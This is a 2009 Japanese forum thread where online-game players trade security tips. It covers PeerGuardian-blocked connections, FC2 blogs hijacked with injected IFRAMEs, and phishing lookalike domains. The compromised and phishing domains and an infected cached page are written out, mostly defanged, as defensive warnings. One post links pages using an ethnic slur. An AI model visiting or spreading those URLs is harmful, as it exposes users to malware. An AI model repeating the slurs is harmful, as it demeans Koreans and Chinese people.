OS再インスコしたら動くかもね <> (○口○*)さん<>sage<>09/08/06 09:21 ID:VCEWaal70<> niftyのスキャン使ってみたらいいんじゃないかな
エンジンはカスペだし

ttp://www.nifty.com/security/vcheck/ <> 386<>sage<>09/08/06 20:52 ID:1DXUSaoA0<> なるほど環境依存なのか… 何が引っかかってるんだろう。

>>390
ありがとう、そっちを使ってみることにするよ。 <> (○口○*)さん<>sage<>09/08/08 12:14 ID:2XxHyb3HO<> ほ <> (○口○*)さん<>sage<>09/08/08 13:06 ID:08mIDYr10<> も <> (○口○*)さん<>sage<>09/08/08 13:24 ID:OZscw7Lh0<>      γ´`ヽ
     _ゝ -''` ー- _
   /          \
  /             ヽ    、′     、 ’、  ′     ’      ;  、
  ,':..              ',       . ’      ’、   ′ ’   . ・ 
  !:::::.  , -────── 、 |     、′・. ’   ;   ’、 ’、′‘ .・” 
  |:::::::. |  `ィェァ    `ィェァ| |         ’、′・  ’、.・”;  ”  ’、 
  |::::::::.. `───────' |    ’、′  ’、  (;;ノ;; (′‘ ・. ’、′”;
  .|:::::::::::..            |  ’、′・  ( (´;^`⌒)∴⌒`.・   ” ;  ’、′・
  |::::::::::::::..           l   、 ’、 ’・ 、´⌒,;y'⌒((´;;;;;ノ、"'人      ヽ
   l:::::::::::::::::....        /        、(⌒ ;;;:;´'从 ;'   ;:;;) ;⌒ ;; :) )、   ヽ
   |:::::..ヽ:::::::::::....      /         ( ´;`ヾ,;⌒)´  从⌒ ;) `⌒ )⌒:`.・ ヽ    ,[]
   |:::::::....` 、:::::::::..  /  ′‘: ;゜+° ′、:::::.    ほも  ⌒(ゞ、⌒)    ヽ/´
   }::::::::::::::::...`ヽ_人,ノ{          `:::、 ノ  ...;:;_)  ...::ノ  ソ ...::ノ  
  ̄:::::::::::::::.:::::::::::::::::::..  ̄ ー- _
::::::::::::::::::::::::::::::::::::::::::::::::....       \
出番っぽいので出張 <> (○口○*)さん<>sage<>09/08/08 14:40 ID:S6SFoLyW0<> >>394
ボムゥメンwww <> (○口○*)さん<>sage<>09/08/10 23:04 ID:kJlEn9Ti0<> 沈む船から逃げるネズミ?ちょっと違うか?
テンプレサイトとかxreaからずいぶん引き上げていったようですねぇ・・逆にxrea,coreserverに
残ってるとこはどんだけあるんだろ・・ <> (○口○*)さん<>sage<>09/08/11 03:38 ID:aYPYcw5G0<> 騎士/クルセ : sakura / coreserver
弓手/雷鳥 : Eldgasyk / xrea
Wiz/Sage : Eldgasyk / sakura
Pri/Monk : xrea / xrea→sakura
暗/悪 : sakura / xrea→sakura
BS/ケミ : coreserver→sakura / sakura

スパノビ : Gamedb(xreaに設置のWikiFarm)
蹴/魂 : xrea / sakura
忍/銃 : xrea→sakura / @Wiki(INTERLINKに設置のWikiFarm)

Common/貧乳 : coreserver
未実装 : sgv417
Quest : inetd
カプラ : WikiWiki.jp(INTERLINKに設置のWikiFarm)

ざっくり調べたのはこんな感じ。
基本的にdigとwhoisで拾っているけど、もしかしたら間違いがあるかもしれない。が、その時はご容赦を。 <> (○口○*)さん<>sage<>09/08/11 08:07 ID:oiRnEAdD0<> >>397
強いて言うならQuestにミラーとしてSage(sakura)とCommon(coreserver)が絡んでる
引っ越ししたのは裏側的にはBSとローグ系の二カ所かな <> (○口○*)さん<>sage<>09/08/12 10:33 ID:klmZ0FoB0<> >>382-384
これ踏んじゃったんだけどほんとに大丈夫なのかしら… <> (○口○*)さん<>sage<>09/08/12 10:38 ID:cpDxiyuY0<> >>399
>>387 <> (○口○*)さん<><>09/08/12 11:16 ID:sDG48UYf0<> 月例age
セキュリティ情報 計9件 (緊急 5件, 重要 4件)
ttp://www.microsoft.com/japan/technet/security/bulletin/ms09-aug.mspx <> (○口○*)さん<>sage<>09/08/12 16:05 ID:5l4pLg/D0<> 大量だな <> RAGWalker ◆7K4/mo8hK.<>sage<>09/08/12 20:40 ID:zyfvjVSf0<> 最近中の人がぐだぐだになっております。すいません。

ちなみに>>398
ragna.infoのミラーはかつ@備忘録氏の自宅鯖+core
の筈なんだけど…備忘録の人に直接聞いてみます。

貧スレWiki/Commonについては撤退か、DQアップローダーで利用しているかつ氏のサーバーに全避難か考慮中であります。
あと、クルセWikiについても私が場所を貸している現状ですので管理人さんと連絡を取ります。

とりあえず現状私自身が身動き取れるか微妙なのですが、支払いが楽なサーバーに移転とか色々考えたいところです。 <> (○口○*)さん<>sage<>09/08/15 17:01 ID:PJKmpq0O0<> カスペオンラインスキャンこないだからずっとメンテ <> (○口○*)さん<>sage<>09/08/15 17:10 ID:XxdLnaNU0<> >>404
カスペのエンジンを使ったオンラインスキャンは複数あるので、
どれのことだかわからん。 <> (○口○*)さん<>sage<>09/08/15 17:51 ID:s+SjR1kM0<> PeerBlock ってのが出てるみたいだね。PG2の後継だか派生だからしい。

XPなのでPG2で事足りてるけど、VistaやWin7の場合はこっちにするとローダーが必要なくなるらしい。
ttp://sourceforge.jp/projects/sfnet_peerblock/
ttp://www.peerblock.com/

詳細は、使ってみた人の報告を待つ。 <> (○口○*)さん<>sage<>09/08/15 18:19 ID:PJKmpq0O0<> >>405
普通の日本版のやつです。
とりあえずniftyでやったわー <> (○口○*)さん<>sage<>09/08/16 01:55 ID:FqKKdzkY0<> 前にログインを癌のページ通さないでできるようにするツール作った神がいたよな
あれどこだっけ?ググれん <> (○口○*)さん<>sage<>09/08/16 02:17 ID:O0o/hpM10<> >>408
そーゆーのは物質スレで聞いてくれ。
ttp://trash.s354.xrea.com/ <> (○口○*)さん<>sage<>09/08/16 02:22 ID:OC5g5jnG0<> >>408
http://trash.s354.xrea.com/

「ROWebLogin」でググっても出てきたよ <> (○口○*)さん<>sage やさしいなおまえら<>09/08/16 03:12 ID:FqKKdzkY0<> >>409-410
すまんかった
礼は言わんぞ <> (○口○*)さん<>sage<>09/08/16 23:07 ID:afsjJbob0<> >>406
下のURL、www■1ive■netとかではじかれるwww <> (○口○*)さん<>sage<>09/08/17 19:49 ID:knn6nwJJ0<> Firefoxで危険性の高いWebページの閲覧をブロックする
ttp://www.atmarkit.co.jp/fwin2k/win2ktips/1198wot/wot.html

アドオンWOTの話題 <> (○口○*)さん<>sage<>09/08/18 13:13 ID:7alByKn50<> >>413の記事だけだと手を出し辛い人向け。
Panda Securityがパートナーシップとして関っているんだね。
それと、FirefoxだけでなくIEで利用できるアドオンも用意されている模様。
ttp://www.ps-japan.co.jp/pressrelease/n71.html <> (○口○*)さん<>sage<>09/08/18 13:22 ID:J7oFhNsU0<> >>414
あんまこのスレで聞かないメーカーだけど有名なの? <> (○口○*)さん<>sage<>09/08/18 13:37 ID:bjjUWXw40<> セキュリティー関係の記事では、それなりに名前が出てくるよ
ちなみにスペインに本社がある

>413って、サイトアドバイザーと同じような物か
サイトアドバイザーは買収されてから使いづらくなったから消してしまったな <> (○口○*)さん<>sage<>09/08/18 13:43 ID:J7oFhNsU0<> >>416
そうなんだー、どうもありがとう
サイト見たらアンチウイルスも軽そうだね <> (○口○*)さん<>sage<>09/08/19 05:04 ID:dnKEwxKm0<> 2レスに渡って失礼します。
すいません。心当たりがありましたら、知恵をお貸しください。

【      気付いた日時          】 2009年8月19日2時10分
【不審なアドレスのクリックの有無 】不明、覚えがありません。
【他人にID/Passを教えた事の有無】 No
【他人が貴方のPCを使う可能性の有無】 No
【    ツールの使用の有無      】 No
【  ネットカフェの利用の有無    】 No
【     OS    】 Microsoft WindowsXP Home Edition Version 2002 ServicePack3
【使用ブラウザ 】 普段はFirfoxバージョン3.5.2 ROにログインするときのみIE8バージョン8.0.6001.18702
【WindowsUpdateの有無】 2009年8月12日更新
【 アンチウイルスソフト 】Kaspersky Internet Security2009
【その他のSecurty対策 】 PeerGuardian2
【 ウイルススキャン結果】2009/08/19 2時54分〜3時13分Kaspersky Internet Security2009にて完全スキャンを実行。検地無し
【スレログやテンプレを読んだか】 Yes
【hostsファイルの変更】有 ROアカウントハック対策スレのまとめサイトのhostsファイル追加分まとめサイト様(最終更新7月上旬)
              リネージュ資料室様(最終更新4月ごろ)
【PeerGuardian2の導入】有 リネージュ資料室様より危険URLリスト、韓国、台湾、中国リスト
               ROアカウントハック報告スレのまとめサイト様 <> (○口○*)さん<>sage<>09/08/19 05:04 ID:dnKEwxKm0<> 本日2時09分ごろに、PCの電源を入れカスペルスキーを更新していたところPG2が点滅し、接続を遮断していることに気づきました。
不安になって即座にLANケーブルを引き抜きました。
ブロックログを確認したところ、以下のIPへ送信しようとしたログが残っていました。

korea 61.111.58.17
korea 61.111.58.9
korea 61.111.58.65

Google、aguseで調べては見たものの、
GoogleではIPリスト(whoisサービス?)らしき物が引っかかるのみ。
aguseでは存在しないURLといわれ、正引きIPアドレスは文字化けを起こしていました。
2時53分ごろ、カスペルスキーにて完全スキャンを行ったところ、開始して一分かそこらで
再びPG2が点滅し、接続を遮断していることに気づきました。
数十秒放置していましたが、点滅が止まる様子が無いため再びLANケーブルを引き抜きました。
このときブロックしていた送信先のIPは以下の通りです。

korea 61.111.58.112
korea 61.111.58.138

ログを確認した後、そのまま完全スキャンを継続し、結果何も検知されませんでした。
その後不安になってスキャンを繰り返したり、Yahooなどで検索していたりしたところ
4時11分から再びPG2がIPアドレスを遮断していたため、LANケーブルを引き抜きました。
このときブロックしていた送信先のIPは以下の通りです。

korea 61.111.58.104
korea 61.111.58.138

そして原因の分からないまま現在に至ります。
何かのソフトウェアが更新を確認しているのかと思いましたが、それらしきものは見当りません。
一体何が起きているのでしょうか、何か心当たりのある方がいらっしゃいましたら、ご教授ください。 <> (○口○*)さん<>sage<>09/08/19 11:04 ID:KRZ1+TU30<> ttp://technet.microsoft.com/ja-jp/sysinternals/bb897437.aspx
ここからTCPViewをダウンロードして調査してみたら
どのソフトがアクセスしてるかわかるんじゃない <> (○口○*)さん<>sage<>09/08/19 17:19 ID:cTpAxxpB0<> 私も>>418さんと同じような症状が今朝出ました。
同じく何かご存知な方がいらっしゃいましたらお知恵をお借りしたいです。

【      気付いた日時          】 09/08/19 6時頃
【不審なアドレスのクリックの有無 】 No
【他人にID/Passを教えた事の有無】 No
【他人が貴方のPCを使う可能性の有無】 No
【    ツールの使用の有無      】 No
【  ネットカフェの利用の有無    】 No
【     OS    】 Windows XP home SP3
【使用ブラウザ 】 Sleipnir2.8.5 (ROログイン時のみIE8)
【WindowsUpdateの有無】 最新のものまで当てています。
【 アンチウイルスソフト 】 AntiVir9
【その他のSecurty対策 】 PeerGuardian2
【 ウイルススキャン結果】 AntiVir9、Kaspersky Internet Security2009(試用版)でフルスキャン。検知無し。
【スレログやテンプレを読んだか】 Yes
【hostsファイルの変更】無
【PeerGuardian2の導入】有 リネージュ資料室様の危険URLリスト
【説明】
ROで放置露天をしていて、朝方PCを見た時にPG2のブロックに気づきました。
ログを見ると0:48〜49分、4:36〜39、5:07〜6:10頃にアクセスがあり、この時点でネット接続を遮断。

ブロックしていたIPは以下になります。
61.111.58.40 で4桁目だけ違うもので(9、17、18、33、40、58、65、120、150)です。

分かる範囲で起動していたソフトは桜時計、LimeChat、PG2、Sleipnir、ROです。
PG2以外を落としてみてもブロックはありました。

>>420さん
試してみようと思ったのですが、今現在アクセスが無く調査ができませんでした。

何かご存知の方がいらっしゃいましたらお知恵をお借りしたいです。 <> 418<>sage<>09/08/19 18:22 ID:hpDXvCLl0<> もしかしたら、IDが変わっているかもしれませんが418です。
>>420
レスありがとうございます。
早速DLして、3時間強ほど眺めてみました。
しかし、ブロックされた接続を再現することができず、調査できませんでした。

毎時10分、30分、50分に[System Process]が[downloads1.kaspersky.co.jp]に
接続している様子が見て取れました。(downloadsX のXが異なる数字のことも有り)
なので偶然カスペルスキーが、韓国のサーバーに更新を確認しに行ったのかと思いましたが
>>421様がカスペルスキーを使用していないあたり、違うようですね。
もうしばらく、様子を見てみます。 <> (○口○*)さん<>sage<>09/08/19 18:34 ID:hpDXvCLl0<> 連投し失礼します。書き忘れがありました。
私が分かる範囲で起動していたソフトは以下の3つです。
Kaspersky Internet Security2009、PG2、ProtectorSuit(指紋を認証するソフト)

4時台に行われた接続のみ、追加でFirefoxも起動していました。 <> 418<>sage<>09/08/20 02:55 ID:RW02Di6v0<> 2009年8月20日2時10分52秒から2時12分9秒かけて、TCPViewにて接続が確認できましたので報告します。
avp.exe:636 TCP your-f1b02cc8af:1116 61.111.58.104:http SYN_SENT
avp.exe:636 TCP your-f1b02cc8af:1125 61.111.58.138:http SYN_SENT

ともにカスペルスキーアイコンの実行ファイルでした。
どうもカルぺルスキーが何かしているようです。
同名のファイルを作成するトロイがあるらしいこと、421様がカスペルスキーを使っていないこと
この2点が気になりますが、しばらくパスワードを打ち込むことはせず、様子を見て使っていこうと思います。
お騒がせしました。 <> (○口○*)さん<>sage<>09/08/20 12:16 ID:9BKittdx0<> 334に続きまたもやFC2ブログ改竄が発生して福建中華がこよなく愛する赤石したらばにリンクが貼られていた。
kanae2262000■blog54■fc2■com
IFRAMEでいつもの4gameranking入り。

赤石したらばには今日の午前8時ごろに誘引リンクが投下された。
とりあえずFC2に通報、ブログ管理人にも連絡。

8月16日のブログキャッシュにはIFRAMEがないためそれ以降に仕込まれたようだ。
FC2ブログユーザーは本当に改竄の順番待ちになっているやも知れぬな。

FC2ブログで特に中華が狙ってるネトゲブログを書いているなら移転するなり閉鎖するなり真剣に考えるべき時かな。
ブログ管理には気をつけれくれよな! <> (○口○*)さん<>sage<>09/08/20 20:32 ID:hIz8g6h00<> 報告乙。

fc2は使ってないから分からないけど、いまだにそういう事例があることからして
抜本的な対策はとられてないんですかね。ずっと前のテンプレ改竄騒ぎのときの
運営側からの腑抜けたようなアナウンスだけしかこちらに見える動きがなかったですっけ。

悪評があるにもかかわらず、多機能やユーザー数が売りで黙ってても利用者が増えて
いるようだし、あんまり力を入れる気も無いんだろうな。そもそもFC2運営は昔から
運営能力は微妙だから期待するだけ無駄なんだろうけど。 <> (○口○*)さん<>sage<>09/08/21 15:24 ID:5dfhSmHn0<> mixi経由で変なファイル送られてきて、垢ハックの事をすっかり忘れてた俺は
ついうっかり中のexeファイルを起動しちゃったんだ
一応zipファイルと解凍した後のファイルも最新状態のavastで検索してみて
特に何も出てこなかったから大丈夫かと思い起動しちゃったんだよね

で、今見たらファイル送ってきた相手は既に退会
とりあえずアカウントロックして、別HDDのOSから起動してこれ書いてるんだけど
垢ハックってウィルスチェックに引っかからないもんなの? <> (○口○*)さん<>sage<>09/08/21 15:47 ID:5rixDp7P0<> 最新のあれなら、かからない可能性がある。 <> (○口○*)さん<>sage<>09/08/21 16:16 ID:amH+v5DA0<> ウィルスなら無条件でひっかかるわけじゃない。
パターンファイルに登録されてなければ、検出できない可能性がある。 <> (○口○*)さん<>sage<>09/08/21 16:40 ID:11Hlmbxj0<> 新種だとカスペだろうがなんだろうがスルーする可能性が高い

>特に何も出てこなかったから大丈夫かと思い起動しちゃったんだよね

なんていうか、もうね・・・セキュリティ意識が低すぎて
お前さんはどのセキュリティソフトを使っても無駄だと思うよ
検出されるされないにかかわらず
出所不明な怪しいexeは起動しないのが基本
変なファイルって言ってる時点で疑ってるのに何で起動するのやら <> (○口○*)さん<>sage<>09/08/21 16:47 ID:XowMxrvO0<> オンラインゲームにしか被害が出ないトロイならまだしも、bot spamだったりしたら更なる被害拡大も十分あり得る。
mixi内でマイミクやコミュニティに色々と撒き散らす事態を引き起こす前に、OSの再インストール or リカバリが上等だな。 <> (○口○*)さん<>sage<>09/08/21 18:50 ID:Mdwii6pU0<> 昨日に続きまたしても福建一味に改竄されたFC2ブログが赤石したらばで確認されたのだった。
hikikomorironri■blog54■fc2■com
IFRAMEで4gameranking入り
8/21の14時ごろにリンクが投下されている。

7/24のキャッシュにはIFRAMEがないからそれ以降にやられた(おそらくリンク投下の数日前)と言う事になるな。
少し前にはアラドの放置ブログも改竄されていたしこりゃマジで終わってる。
ネトゲ以外の一般FC2ブログにおいても福建一味の改竄、再改竄事例があるわけだから
臭いものに蓋する運営体質が良くわかるなぁ。
そしてブログ等の規約準拠法を米のネバダ州法にして責任逃れする気満々だ。(利用規約:紛争処理にちゃんと書いてある)
文句あるならこっちまで来て訴えて見ろと言う感じで。
(FC2ブログ利用規約から抜粋)
■紛争処理
本規約は、米国ネバダ州法が適用されるものとします。
*他のブログサービスは当たり前だが日本法準拠。

管理するにもブログを新たに作るときにも気をつけてくれよな! <> (○口○*)さん<>sage<>09/08/21 19:03 ID:Mdwii6pU0<> 432に追加、21日1時ごろに赤石したらばに投下されていた
福建中華により改竄されたFC2ブログ。
kohakuironhot■blog53■fc2■com
これもIFRAMEで4gamerankingが入っている。

そしてどう見ても記事の内容はネトゲ関連ではない。
最終更新が8/18日であり放置ではない、これはまずい展開。
ここに来て新ドメイン取得ペースが鈍化した変わりにFC2ブログを中心に内容問わず改竄をエスカレートさせているな。 <> (○口○*)さん<>sage<>09/08/21 21:08 ID:XeH/+i9u0<> FC2の言論封殺行為
ttp://ameblo.jp/disclo/entry-10022466509.html
「FC2」の実態はバカチョン会社
ttp://antikimchi.seesaa.net/article/30738206.html <> (○口○*)さん<>sage<>09/08/21 22:48 ID:T6z8Y8A20<> んなこたどうでもいい <> (○口○*)さん<>sage<>09/08/24 03:30 ID:jRB+5PGO0<> どうもfc2は中国の一部でよく使われるらしい
中国語のサイトが結構ある

普通のサイトや違法サイトもあるからそこそこ知名度はあるんだろうと思う <> (○口○*)さん<>sage<>09/08/24 05:10 ID:CL8UkOGU0<> >>436
HPは知らないけどFC2のブログといくつかのサービスは多言語化してるよ

【ブログ】FC2ブログが中国語(簡体字)に対応!!
ttp://blog■fc2.com/info/blog-entry-254.html

【カウンター】FC2カウンターが中国語(簡体字)に対応!!
ttp://blog■fc2.com/info/blog-entry-257.html

FC2ブログ フランス語版が登場!
ttp://blog■fc2.com/info/blog-entry-372.html
>現在使用できる、多言語版のFC2ブログは次のとおりです。
>・英語版  ・中国語(簡体字)版  ・中国語(繁体字)版 
>・タイ語版  ・韓国語版  ・ドイツ語版  ・スペイン語版  ・ロシア語版 <> (○口○*)さん<>sage<>09/08/26 11:35 ID:BVAOHoGj0<> ログインツール対策されたっぽいな <> (○口○*)さん<>sage<>09/08/26 11:43 ID:m554LfLI0<> >>438
kwsk <> (○口○*)さん<>sage<>09/08/26 11:53 ID:J4dcl4I80<> なんでこのスレなんだ


支援ツールのススメ #17
http://enif.mmobbs.com/test/read.cgi/livero/1244970578/ <> (○口○*)さん<>sage<>09/08/26 12:30 ID:7r/Pw3BT0<> うん、アカハックやセキュリティとは強引に解釈しないと関係無いし、>>440のスレの方がいいと思う。 <> (○口○*)さん<>sage<>09/08/26 12:36 ID:BVAOHoGj0<> 前ここに統合されたと聞いたのでな
すまんかった。向こうに飛ぶ <> (○口○*)さん<>sage<>09/08/26 12:47 ID:/9rQDBzA0<> 脆弱性発見ソフト「SecuniaPSI」日本語を含む42言語に対応

ttp://internet.watch.impress.co.jp/docs/news/20090826_310758.html <> (○口○*)さん<>sage<>09/08/26 19:17 ID:Tzl+GZ1C0<> Secuniaがやる気出したな
これ常駐でなくていいからインストールしておいて、時々回してみた方がいいよ <> (○口○*)さん<>sage<>09/08/28 10:17 ID:f8GA2glN0<> 少し前に中華に乗っ取られたFC2ブログ、最近になって動きあり。
kotaro733●blog34●fc2●com

ハニーポット状態の赤石掲示板の他、エロやらモンハンやらあちこちで誘引が確認できる。
最近では8/16にBLAZBLUE(ブレイブルー)したらばにおいて投稿があった様子。

今まではIFRAMEを記事の中に埋め込むと言う手口だったが、
8月に入り中華自ら記事を作成するように、もはや末期的症状。
数年前にやられたライブドアブログを髣髴とさせる。

放置しとくとそれこそどんどん侵食され最後には中華のブログとなるって事だな。
ブログ持ち、特にFC2使いは気をつけてくれよな! <> (○口○*)さん<>sage<>09/08/28 17:16 ID:f8GA2glN0<> 445のブログ、今になってFC2に消されてた。
ソースチェッカーオンラインのチェック結果、ライブドアの検索キャッシュでのみ中華が書き込んだ8月の記事を確認可能?
Googleでは危険判定で見れず、Baiduではそれ以前のキャッシュしか出てこない。

キャッシュでもIFRAMEが仕込まれており危険なため四角にしておく。
ttp://74■125■153■132/search?client=livedoor&hl=ja&ie=euc-jp&q=cache%3AByLqknuYT1kJ%3Ahttp%3A%2F%2Fkotaro733■blog34■fc2■com%2Fblog-entry-38.html+%B9%F5%C7%AD%A4%C8%C7%F2%CF%B5%A4%CE%C0%B3%A4%DF%BD%E8&channel=web

連投ごめんね。 <> まとめ臨時 ◆kJfhJwdLoM<>sage<>09/08/29 19:13 ID:6AzYh4ck0<> 8080なインジェクションをcNotes様が解説していました。
http://jvnrss.ise.chuo-u.ac.jp/csn/index.cgi?p=%3A8080%A1%DCindex%2Ephp

ROでは最近報告されることが無くなってしまったのですが、
他のオンラインゲームでは少し前に
:8080系(2222やら338など色々)はアカウントハック系でも頻繁に見られた形だったと記憶しています。

どの罠サイトでもそうなのですがドメインは無尽蔵に作られるので
上記サイトの下部ページに記述されている罠ドメインのIPをPG2に登録しておけば、
そこそこのものは防げてしまうのではないでしょうか。(変更されなければという期限付きですけど)

というかホストファイルには多すぎて纏めきれないしPG2で何とかというオチでした。
あとオラに元気を分けてください。 <> (○口○*)さん<>sage<>09/08/30 03:27 ID:c4F0h9zq0<> しょうがないわねえ。ちょっとだけよ。 <> (○口○*)さん<>sage<>09/08/30 17:52 ID:izmVnIBs0<> ROラトリオ <> (○口○*)さん<>sage<>09/08/30 19:16 ID:fmKgtjt10<> >>449
ROラトリオに何かあったの? <> (○口○*)さん<>sage<>09/08/31 04:46 ID:HFmZO2310<> 多分これの事じゃないかと思って引用。
ttp://roratorio.2-d.jp/ro/form/kaitou.html
【投稿】[ お名前 ]じゅり
[ 本文 ]なぜか、今日になって、ノートンのインターネットセキュリティで、
こちらのサイトからコンピュータの脅威を検出するようになってしまいました。
一昨日までは何も検出されませんでした。
確認の方よろしくおねがいいたします。
下のURLは、ノートンで検出した際に出る、脅威の詳細のページです。
http://safeweb.norton.com/report/show?url=2-d.jp
【回答】URL先を見ましたが当サイトroratorio自体にではなく、○○.2-d.jpってサイトにノートンが反応しているようですね。(○○はURL先で確認できます)
そのせいで2-d.jpのサイト全てにノートンが注意を出している模様です。
うちのサイトはレンタルサーバに置いてあるので、同じレンタルサーバを使っている人の中に2-d.jpというサイトを使っている人は何人もいます。
ノートンのインターネットロボットには2-d.jpが複数のサーバなのか複数の管理者が運営しているのかわからないからまとめて警告出しているのだと思います。
ノートン使ったことありませんが、うちのサイトroratorio.2-d.jpを許可リストやホワイトリストと呼ばれるものに記入すれば警告は出なくなるかもしれません。

要はSLD単位での巻き添えらしい。 <> (○口○*)さん<>sage<>09/08/31 12:12 ID:SNN68lDj0<> 多分それの事だろうね
過剰反応する物もあるから稀に良くある出来事 <> 450<>sage<>09/08/31 13:26 ID:wb3S1olp0<> わざわざ丁寧にありがとう! <> (○口○*)さん<>sage<>09/09/01 16:49 ID:6uoZsdes0<> Opera 10.00 リリース <> まとめ臨時 ◆kJfhJwdLoM<>sage<>09/09/01 19:51 ID:wcLLB3+a0<> 先に三行。
版権所有と赤文字で書かれてたのに気が付いて、転載自体が問題にならないかと心配。
テキストには転載元は記載しているけどサイトからも
しっかりリンクするべきなのか悩みどころ。知恵を貸して欲しい。




餅は餅屋という事で、向こうの最新の情報をと
本格的に転載を始めてからはテキストのほうに転載の旨と転載元を記載しているのですが、

ttp://www■mouse0232■com/post/534/ (念のために■を入れてます)
今日向こうの国のmouse0232様のチェックしていた時、
hosts形式で書かれたページの下のほうに強調された赤文字が目に入った。
感嘆符付で太い文字だったので気になったので
ヤフーのウェブ翻訳を使うとこんな感じの意味。

「版権所有。転載する時は鎖によって
 形式明記した作者と原始のでどころと本を継ぐべく明言する」

意味はよく判らないのですが、自分の都合で解釈するなら
「このページの版権を所有しています。
 転載する場合は転載元と作者を明記してリンクしてください」
って感じなのだろうかと。

最近追加されたのか判らないのというか、
こんな記述があったのに今の今まで気が付いていなかったというか、
前は無かった気がするのですが見えて無かっただけかも知れないし…。
転載をこのまま続けた場合、問題とか起こらないか結構心配です。

hostsファイルのサイトのトップページに向こうの転載元は記載しているのですが
(ちなみにサイト自体はWhoisで調べたらアメリカでした。)
トップページでリンクした場合、自サイトに訪れる人の条件が条件だけに
もしリンク先に跳んだ場合、パッと見で言語的に初心者的には混乱を招かないかとか。 <> (○口○*)さん<>sage<>09/09/01 20:31 ID:P+HrjGID0<> >>455
引用の要件を満たしていれば問題無いかと。

・引用部が主ではなく従である
・出典が明らかにされている

おおざっぱに言えばそんだけ。 <> FFXI(仮)<>sage<>09/09/01 20:33 ID:6uoZsdes0<> txtに書いてある現状でいいと思いますよ。
うちもBlastさん(しばらく学業に専念されるそうです)とか
知道安全さんとかikakaさんとか毎日参考にしています。
有害ドメインの情報は広く共有してナンボだと思っていますし、
解析した文章のコピペならともかくドメイン名だけなら
創作的な知的財産とは言えないかなと。

↓ゲンナリするほど激しいikakaさん
tool.ikaka.com/report.asp の下のほう。
最近物足りなくね? と思ったらどうぞw <> (○口○*)さん<>sage<>09/09/01 21:40 ID:RRPV2LTY0<> >>456
ここで主従関係は成り立たないと思うよ
全体に対して各要素が主従関係にあるのは当たり前のことで
要素に対して引用要素が主従関係にないと

もしそれが認められるなら、世の中のソフトウェアライブラリで
引用としてライセンス無視に使用が認められるケースが多発するんじゃないかな <> (○口○*)さん<><>09/09/02 01:03 ID:lhEZKnxo0<> なんとなくage <> まとめ臨時 ◆kJfhJwdLoM<>sage<>09/09/02 01:13 ID:Bv74GTq10<> レスありがとうございます。

>>456
赤文字で強調分で感嘆符でなんか怒ってるのかな?
みたいな印象に思えてしまったので凄く不安になったので。
とりあえずおんぶしてもらっている立場としては引用元は明記するよう心がけようかと。

>>456
いつもお世話になっております。
確かにこのようなデータは出来るだけ共有したい物ですね。
今回テキストは少し書き直して翻訳したら向こうの言葉で意味が通じるように
翻訳を試行錯誤して書いてみた次第です。

オンラインゲーム汎用のhostsファイルが出来たらとおもったのですが、
ドメインについては自力で探すのが困難で数も数なので
出来る範囲で要所を纏められたらと。
そのうち全部IPふさいでホワイトリストIPを配布した方が早いとかならない事を祈ります。
もっといい対策があればいいのですが、オンラインゲームだけに留まらなくなって難しいです

有害ドメインについては‥物足りないぐらいの方がいいですっ。 <> まとめ臨時 ◆kJfhJwdLoM<>sage<>09/09/02 01:19 ID:Bv74GTq10<> あーアンカーがミスってる。二個目の>>456>>457のFFXI(仮)様宛てです。

とりあえず現状このままで様子を見てみます。ありがとうございました。
テキストを向こうで翻訳して読んでくれていたらいいな…と他力本願だったり。 <> (○口○*)さん<>sage<>09/09/02 06:29 ID:7me/SRgW0<> >>455,460
データの性質上、権利云々よりも世代管理の方を重視しているのではないでしょうか。
転載が繰り返されると、その中には古い情報のまま更新されない物も出てくるのはある程度防ぎ切れません。
そういった場合に、オリジナルのサイトに対してアクセスする手段を明示しておかないと、データの齟齬が発生しますので。

>全部IPふさいでホワイトリストIPを
既にそうなりつつあるような気もしています。
これはmalwareだけに限った事ではなく、Flash cookieのようなtracking目的の物なども含めた観点で。 <> (○口○*)さん<>sage<>09/09/02 06:47 ID:yLv7SkKa0<> >>461
そもそもネットに公開した時点で引用されるのは百も承知だろう。
ちゃんと出典を明示しておけば問題はないと思うな。
福建中華のパクリブログみたいにタイトルから中身まで諸々全部パクるのはまずいけど。

余談
ネ実のハックスレは規制巻き添えで書けないからこっちで
playonline-enix■com
福建福清市登録、郵便番号は不明な場所、中国ネット業者所有のアメリカサーバ利用。

以下WHOIS抜粋
Whois Record
DomainName : PLAYONLINE-ENIX■COM

RSP: China Springboard Inc.
URL: http://www■namerich■cn (WHOISするとnamerich■comも同じ業者)

Creation Date ..................2009-08-28

Registrant City..................fuqingshi (福清市)
Registrant Province/State .......FuJian (福建省)
Registrant Country Code .........CN
Registrant Postal Code ..........600085 (?)


英語でURLつけてtellだのしてくるのは中華だと思え、位の気持ちがちょうどいい。
フィッシングには気をつけてくれよな! <> (○口○*)さん<>sage<>09/09/02 07:02 ID:s7jPTVsG0<> それは既にリスト入りしてるけど、
enixの部分がeuixのもあったりする。 <> (○口○*)さん<>sage<>09/09/02 08:00 ID:yLv7SkKa0<> >>464
euixを調べると微妙にWHOISが違うね。
登録地が吉林省に、郵便番号は遼寧省本渓市となる。
類似ドメインを短期間にいくつも取れる辺り福建一味臭がプンプンする。
ソースを見たが中身は一緒のようで、いかにもって感じ。
最近汎用攻撃用新ドメインを見ないと思ったら再びFF攻撃に注力してるのかな。 <> (○口○*)さん<>sage<>09/09/02 16:57 ID:fAKqlViH0<> 「G DATA 2010」シリーズ、ホワイトリスト採用でスキャン高速化
http://internet.watch.impress.co.jp/docs/news/20090902_312349.html
>ダブルエンジン(BitDefende、avast!)を搭載する。最新バージョンでは、ホワイトリストによる
>誤検知回避とスキャンの高速化を図ったほか、メモリ占有率を削減し、動作を軽くした。

> CDブート・USBブート機能においては、OSにUbuntu(Linux)を採用して起動の高速化を図った。
>ブート機能でもダブルエンジンを搭載したほか、他社製品インストール中のPCでもスキャンできるようになった。


1ライセンス3台のWindowsとMacで使える「ウイルスバスター2010」
http://internet.watch.impress.co.jp/docs/news/20090902_312473.html
>PCへの負荷も軽減しており、「ウイルスバスター2009」と比較して、起動時間を約3割、
>不正プログラムが感染しやすい場所に重点を置いて短時間でウイルス検索を行う
>「クイック検索」の時間を約2割短縮した。

高速化を謳うようになってはきたけど、バスターはROと干渉する報告多いからなぁ… <> (○口○*)さん<>sage<>09/09/02 17:02 ID:sbhcRVeF0<> ジャストシステム,「Kaspersky Internet Security 2010」を10月16日に発売
http://itpro.nikkeibp.co.jp/article/NEWS/20090901/336340/

>世界中のユーザーから未知の脅威に関する情報を収集する「カスペルスキー
>セキュリティーネットワーク(KSN)」の機能を強化した。

